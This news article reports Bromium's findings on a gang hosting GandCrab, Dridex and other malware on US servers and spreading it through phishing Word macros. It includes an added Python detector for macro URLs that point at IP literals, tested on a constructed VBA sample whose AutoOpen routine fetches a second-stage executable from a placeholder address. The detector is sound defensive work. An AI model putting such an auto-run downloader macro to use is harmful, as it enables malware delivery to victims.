Cyber-criminal gang uses US-based web servers to host and distribute malware
Bromium, a virtualization company, found in a recent investigation that cyber-criminals were using US-based web servers to host and distribute ransomware, information stealers and banking Trojans. One such gang, which probably has links to the operators of the infamous Necurs botnet, is reportedly abusing more than a dozen US-based servers, apparently forming a network that helps attackers spread various strains of banking Trojans, ransomware and other malicious programs to targets based mainly inside the country.
Bromium says it has been tracking the gang's activities for almost a year, during which it has seen the gang use the servers to host at least 2 ransomware families, 3 info-stealers and 5 banking Trojan families. The malicious programs include the GandCrab ransomware, the Dridex banking Trojan and Neutrino, a well-known attack toolkit.
To distribute these malware strains, the gang uses phishing e-mails that are markedly similar to one another, suggesting they come from the same attackers. Many of the e-mails carry Microsoft Word files containing malicious VBA macros, as well as web links leading to the same US-based servers. Every macro in the phishing e-mails has a hard-coded IP address, rather than a domain name, for the web servers hosting the second-stage malware.
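As an added example, not taken from the Bromium report or this article, the following Python heuristic flags URLs in VBA macro source whose host is a hard-coded IP literal rather than a domain name, which is the indicator described above. The macro excerpt, the function names and the string-concatenation folding are all constructed for illustration, and the addresses come from the reserved TEST-NET range so none of them is a real indicator.

```python
import re
from ipaddress import ip_address

# Constructed VBA macro excerpt (not from the campaign). Hosts use the reserved
# TEST-NET-1 range 192.0.2.0/24 and example.com, so nothing here is a real IoC.
SAMPLE_MACRO = r'''
Sub AutoOpen()
    Dim u As String
    u = "http://192.0.2.10/update/stage2.exe"
    Call Fetch(u)
    v = "https://" & "192.0.2.25" & "/cdn/img.php"
    w = "https://www.example.com/docs/invoice.pdf"
End Sub
'''

# group(0) is the whole URL, group(1) the host without any port
URL_RE = re.compile(r'https?://([^/\s"\':]+)(?::\d+)?[^\s"\']*', re.IGNORECASE)
# '"a" & "b"' -> '"ab"': VBA literals split with & are joined before scanning
CONCAT_RE = re.compile(r'"\s*&\s*"')


def fold_string_concat(source: str) -> str:
    """Join adjacent VBA string literals so a URL built from pieces is seen whole."""
    return CONCAT_RE.sub('', source)


def host_is_ip_literal(host: str) -> bool:
    """True when the host part parses as an IPv4/IPv6 address, False for a name."""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def find_urls(macro_source: str) -> list:
    """Return every URL in the macro with its host and whether the host is an IP literal."""
    findings = []
    for m in URL_RE.finditer(fold_string_concat(macro_source)):
        host = m.group(1)
        findings.append({'url': m.group(0), 'host': host,
                         'ip_literal': host_is_ip_literal(host)})
    return findings


def suspicious_urls(macro_source: str) -> list:
    """URLs that point at a hard-coded IP address instead of a domain name."""
    return [f['url'] for f in find_urls(macro_source) if f['ip_literal']]
```

The two IP-literal URLs are flagged while the domain-name URL is not; a real deployment would run this over macro text extracted from the document, e.g. with an OLE/VBA parser, and treat a hit as a triage signal rather than proof of malice.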
According to Bromium, its investigation indicates that the ongoing campaigns come from a single well-organized operation resembling 'Amazon-style' fulfilment. One threat actor is responsible for the hosting and the e-mail, while others run the malware operations. The entity that controls the hosting infrastructure therefore acts as a "choke point" for the gangs responsible for the respective malware families, the company explains. www.darkreading.com posted this on April 4, 2019.
There have also been multiple instances of the threat group using those same servers while carrying out its malware attacks, either combining first- and second-stage malware in a single attack or hosting different attacks every week.
Bromium says it has notified the relevant authorities. The US-based company that supports the malicious servers, along with its affiliates, also has legitimate customers attracted by the inexpensive web-hosting rates it offers. Moreover, the company has registered nearly 53,000 IPs, only a few of which hosted malware.
SPAMfighter News - 4/12/2019